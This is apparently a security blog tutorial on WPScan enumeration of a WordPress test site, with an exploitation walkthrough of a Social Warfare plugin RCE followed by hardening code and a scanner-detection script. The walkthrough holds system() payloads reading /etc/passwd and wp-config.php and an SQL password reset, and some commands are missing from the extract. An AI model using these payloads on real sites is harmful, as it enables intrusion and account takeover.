Wpscan Usage Example (Enumeration + Exploit) : Cyberpunk Vulnerability Analysis
Introduction
WordPress is the main target when it comes to hacker attacks. Around 30% of
websites worldwide are using it, and based on some rough estimates, at least
60% of them are vulnerable to attacks. In this article we're going to show you how
vulnerable WordPress can be through a WPScan usage example.
WPScan is a black box WordPress vulnerability scanner written for security professionals
and blog maintainers to test the security of their sites.
$ wpscan --update
If already running:
Build and run:
Get a shell:
And you're on your way. Find some vulnerable plugins or themes and let the
games begin. This is a great Docker option for exploring WP's vulnerabilities.
--proxy PROTOCOL://IP:PORT
--proxy-auth LOGIN:PASSWORD
--wp-content-dir : Set custom content dir
--wp-plugins-dir : Set custom plugin dir
--plugins-detection MODE : Modes: mixed, passive, aggressive
-P, --passwords FILE-PATH : List of passwords to use during the password attack
-U, --usernames LIST : List of usernames to use during the password attack
vp : vulnerable plugins
ap : all plugins
p : plugins
vt : vulnerable themes
at : all themes
t : themes
tt : timthumbs
cb : config backups
dbe : Db exports
u : user IDs
m : Media IDs range
As a more specific example, on our playground we're going to use aggressive
vulnerable plugin detection:
Interesting Finding(s):
[+] http://playground.cyberpunk.rs:81/
| Interesting Entries:
| - Server: Apache/2.4.7 (Ubuntu)
| - X-Powered-By: PHP/5.5.9-1ubuntu4.27
| - SecretHeader: SecretValue
| - via: Squid 1.0.0
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] http://playground.cyberpunk.rs:81/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
...
[+] Enumerating All Plugins (via Aggressive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
...
[+] loginpress
| Location: http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/
| Last Updated: 2019-03-07T20:20:00.000Z
| Readme: http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/readme
| [!] The version is out of date, the latest version is 1.1.21
| [!] Directory listing is enabled
|
| Detected By: Known Locations (Aggressive Detection)
|
| [!] 1 vulnerability identified:
|
| [!] Title: LoginPress <= 1.1.15 - Authenticated Blind SQL Injection
| Fixed in: 1.1.16
| References:
| - https://wpvulndb.com/vulnerabilities/9217
| - https://plugins.trac.wordpress.org/changeset/1988326/loginpress
|
| Version: 1.1.10 (100% confidence)
| Detected By: Readme - Stable Tag (Aggressive Detection)
| - http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://playground.cyberpunk.rs:81/wp-content/plugins/loginpress/readme.txt
..
[+] social-warfare
| Location: http://playground.cyberpunk.rs:81/wp-content/plugins/social-warfare/
| Last Updated: 2019-04-23T16:53:00.000Z
| Readme: http://playground.cyberpunk.rs:81/wp-content/plugins/social-warfare/re
| [!] The version is out of date, the latest version is 3.5.4
| [!] Directory listing is enabled
|
| Detected By: Known Locations (Aggressive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
| Fixed in: 3.5.3
| References:
A short info on symbols:
WPScan offers a bunch of references related to this specific vulnerability and
exploit. For "Social Warfare", on one of the references (wpvulndb) we can see
that this vulnerability/exploit affects all versions up to 3.5.2, and we can even see
a proof of concept (PoC):
"Unauthenticated remote code execution has been discovered in functionality that handles
settings import".
Beautiful, cool, let's try it. We're going to use "remote-attacker.com" to place our
payload, so:
http://playground.cyberpunk.rs:81/wp-admin/admin-post.php?swp_debug=load_options&
<pre>system('cat /etc/passwd')</pre>
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin b
Damn, that's messed up. We're in control, but how much? Let's see who we are.
Replace the previous payload.txt with:
<pre>system('whoami')</pre>
Result:
www-data
Good for them, at least it's not root.. yet. Since we know this is WordPress, let's
look for the classic path of "wp-config.php" and try to read it with payload.txt:
Result:
Yeah, bit**. That’s what we’re talking about, slowly working your way towards the
dark side & unlimited power !!!
Just to be sure, we're going to check if those credentials work with the DB. The blog
might be situated elsewhere, on some other path or vhost, so you might need to explore
the system a bit. For now, replace the payload once again:
Yes, we're definitely in. With MySQL access, we can alter some user's WP
password (cp_admin), add a new WP user (admin), etc.
UPDATE wp_users SET user_pass = MD5('yourpass') WHERE user_login='username';
We can most likely use some privilege escalation techniques to get root access
to the system itself. We'll cover that in some other article, later on.
Defense / Prevention
To defend against plugin, theme or user enumeration, there are some options and
techniques you can use.
Note: We don't agree, but based on some sources, user enumeration is not considered to be
a vulnerability (source).
Usernames are enumerated from different sources:
[+] cyberpunk
| Detected By: Rss Generator (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
You can try disabling some of those sources and different segments by adding
this to your theme's functions.php:
// REMOVE RSSs
function wpb_disable_feed() {
    wp_die( __( 'No feed available, please visit our ' . get_bloginfo( 'url' ) ), 'Info' );
}
// hook every feed type to the function above (the hook registration was cut from the extract)
foreach ( array( 'do_feed', 'do_feed_rdf', 'do_feed_rss', 'do_feed_rss2', 'do_feed_atom' ) as $feed ) {
    add_action( $feed, 'wpb_disable_feed', 1 );
}
// REMOVE THE /wp/v2/users REST ENDPOINTS (filter opening reconstructed; the extract kept only its closing lines)
add_filter( 'rest_endpoints', function( $endpoints ) {
    if ( isset( $endpoints['/wp/v2/users'] ) ) {
        unset( $endpoints['/wp/v2/users'] );
    }
    if ( isset( $endpoints['/wp/v2/users/(?P<id>[\d]+)'] ) ) {
        unset( $endpoints['/wp/v2/users/(?P<id>[\d]+)'] );
    }
    return $endpoints;
});
//PREVENT /author=
if ( ! is_admin() ) {
    // default URL format (?author=N in the query string)
    if ( isset( $_SERVER['QUERY_STRING'] ) && preg_match( '/author=([0-9])/i', $_SERVER['QUERY_STRING'] ) ) {
        wp_die( 'Author archives have been disabled.', "Info", 200 );
    }
    add_filter( 'redirect_canonical', 'custom_check_enum', 10, 2 );
}
function custom_check_enum( $redirect, $request ) {
    // permalink URL format (WordPress would otherwise redirect ?author=N to /author/name/)
    if ( preg_match( '/\?author=([0-9])(\/*)/i', $request ) ) {
        wp_die( 'Author archives have been disabled.', "Info", 200 );
    }
    return $redirect;
}
or
function custom_block_user_enum() {
    if ( is_admin() ) return;
    // numeric author parameter in GET/POST/cookie data
    $author_by_id = ( isset( $_REQUEST['author'] ) && is_numeric( $_REQUEST['author'] ) );
    if ( $author_by_id ) {
        wp_die( 'Author archives have been disabled.', "Info", 200 );
    }
}
add_action( 'template_redirect', 'custom_block_user_enum' );
or simply:
wp_die( 'Author archives have been disabled.', "Info", 200 );
}
location ^~ /wp-admin/upgrade.php {
    #allow 127.0.0.1;
    deny all;
    error_page 403 =404 /;
}
$ truncate -s +1 loading.gif
Or altering all JS and CSS files by adding single space at the end:
$ find /var/www/wordpress/ -type f -name '*.js' -exec sh -c 'printf " " >> "$1"' sh {} \;
$ find /var/www/wordpress/ -type f -name '*.css' -exec sh -c 'printf " " >> "$1"' sh {} \;
It works, but it might be too much for some people. A WordPress update would most likely
overwrite such changes, so you'll have to set up a script to run every time WordPress gets
updated.
If you’re paranoid you can disable REST API entirely, allowing only specific IPs to
access it:
Disable XMLRPC
XML-RPC is useful, but it can be used against you for:
Intel gathering
Port scanning
DoS attacks
Router hacking
[+] https://www.cyberpunk.rs/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_s
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingbac
location ^~ /xmlrpc.php {
    #allow 1.2.3.4;
    deny all;
    error_page 403 =404 /;
}
Now, if you use XML-RPC to automate some tasks (update/add/remove users/posts), you
might consider adding some whitelisted IPs in the allow section.
// REMOVE ?ver= FROM CSS/JS URLS (function opening reconstructed; the extract kept only its closing lines)
function remove_cssjs_ver( $src ) {
    if ( strpos( $src, '?ver=' ) !== false ) {
        $src = remove_query_arg( 'ver', $src );
    }
    return $src;
}
add_filter( 'style_loader_src', 'remove_cssjs_ver', 1000 );
add_filter( 'script_loader_src', 'remove_cssjs_ver', 1000 );
This security-through-obscurity approach is not the best strategy, but at least
you can make an attacker's life a bit more difficult. It's hard to cover all of
those "holes", but if you go through with it, WPScan would end up with:
People use different things to prevent such enumeration and approach it from different
sides (Apache/.htaccess, nginx or functions.php). Benefits vary; it's up to you. Here we
can't possibly cover everything used by this scanner or attackers, nor how to defend against
them, so we're going to cover this subject more extensively later on.
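On the detection side, the scan output above shows exactly which requests the enumeration relies on: plugin readme.txt fetches (Readme - Stable Tag), ?author=N probes, the REST users endpoint, feed fetches (Rss Generator) and direct hits on xmlrpc.php. As an added example that is not part of the original article, the following script runs over access-log lines and flags a client that issues several of those probe kinds; the log lines are constructed and the thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict

# Request paths matching the probes the scan above relied on. Detection keys on the
# request pattern, not on the User-Agent string, which a scanner can change at will.
PROBE_PATTERNS = {
    "plugin_readme": re.compile(r"/wp-content/plugins/[^/]+/readme\.txt"),  # Readme - Stable Tag
    "author_probe": re.compile(r"[?&]author=\d+"),                          # user ID enumeration
    "rest_users": re.compile(r"/wp-json/wp/v2/users"),                      # REST users endpoint
    "feed": re.compile(r"/feed/?$|[?&]feed="),                              # Rss Generator
    "xmlrpc": re.compile(r"/xmlrpc\.php"),                                  # Direct Access
}

# Combined log format: ip - - [time] "METHOD path HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify(line):
    """Return (ip, probe_kind) for a log line that matches a probe pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for kind, pattern in PROBE_PATTERNS.items():
        if pattern.search(m.group("path")):
            return m.group("ip"), kind
    return None

def find_scanners(lines, min_kinds=2, min_hits=5):
    """Flag IPs that touch several distinct probe kinds, or many probe URLs in total.
    Thresholds are assumptions; a single feed fetch from a feed reader is not flagged."""
    hits = defaultdict(Counter)
    for line in lines:
        found = classify(line)
        if found:
            ip, kind = found
            hits[ip][kind] += 1
    return {ip: dict(kinds) for ip, kinds in hits.items()
            if len(kinds) >= min_kinds or sum(kinds.values()) >= min_hits}

# Constructed sample: one WPScan-style run from 203.0.113.7, ordinary traffic from 198.51.100.9.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2019:12:00:01 +0000] "GET /wp-content/plugins/loginpress/readme.txt HTTP/1.1" 200 5120 "-" "WPScan v3.5.3"
203.0.113.7 - - [10/May/2019:12:00:01 +0000] "GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1" 200 7311 "-" "WPScan v3.5.3"
203.0.113.7 - - [10/May/2019:12:00:02 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.5.3"
203.0.113.7 - - [10/May/2019:12:00:02 +0000] "GET /wp-json/wp/v2/users HTTP/1.1" 200 845 "-" "WPScan v3.5.3"
203.0.113.7 - - [10/May/2019:12:00:03 +0000] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "WPScan v3.5.3"
198.51.100.9 - - [10/May/2019:12:00:05 +0000] "GET /feed/ HTTP/1.1" 200 9000 "-" "FeedReader/1.0"
198.51.100.9 - - [10/May/2019:12:01:05 +0000] "GET /2019/05/some-post/ HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, kinds in find_scanners(SAMPLE_LOG.splitlines()).items():
        print(ip, kinds)
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; the same patterns map directly onto the nginx deny rules and functions.php hooks shown above.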
Conclusion
The WPScan guys did a great job with this tool. Depending on what your goal is,
defending your blog or attacking one, you might need a different level of skill set.
On the other hand, if you're trying to hack some WordPress site, you might need more.
The WPScan guys made this process look easy (it frequently is), but it's not always so.
Sometimes you'll need a thorough understanding of WP/PHP, Linux and DBs
in order to compromise the system and fully understand the vulnerability/exploit at
hand.